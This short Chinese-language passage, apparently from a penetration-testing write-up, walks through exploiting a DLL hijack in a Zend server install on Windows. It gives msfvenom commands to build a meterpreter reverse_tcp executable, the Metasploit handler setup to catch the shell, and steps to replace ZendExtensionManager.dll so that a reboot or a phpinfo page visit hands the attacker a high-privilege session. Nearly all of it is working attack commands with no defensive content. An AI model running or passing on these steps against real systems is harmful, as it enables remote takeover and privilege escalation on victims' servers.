1. 漏洞利用过程
msfconsole生成反弹shell:
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip port=端口 -f exe > /var/www/html/shell.exe
在其中一个dos框中进行监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost kaliip
set lport 设置端口
run/exploit
将生成的shell.exe上传到靶机中。然后打开Zend_DLL_Hijacking.exe,填入exe路径。DLL路径就是改过名字的原来的ZendExtensionManager.dll的路径。然后生成DLL文件。随后将生成的DLL文件上传到原ZendExtensionManager.dll路径位置顶替冒充。一旦靶机重新启动或者攻击者重新访问web页面(例如其中的phpinfo())就会重新加载dll,此时msf便会监听到对话并且权限为高权限。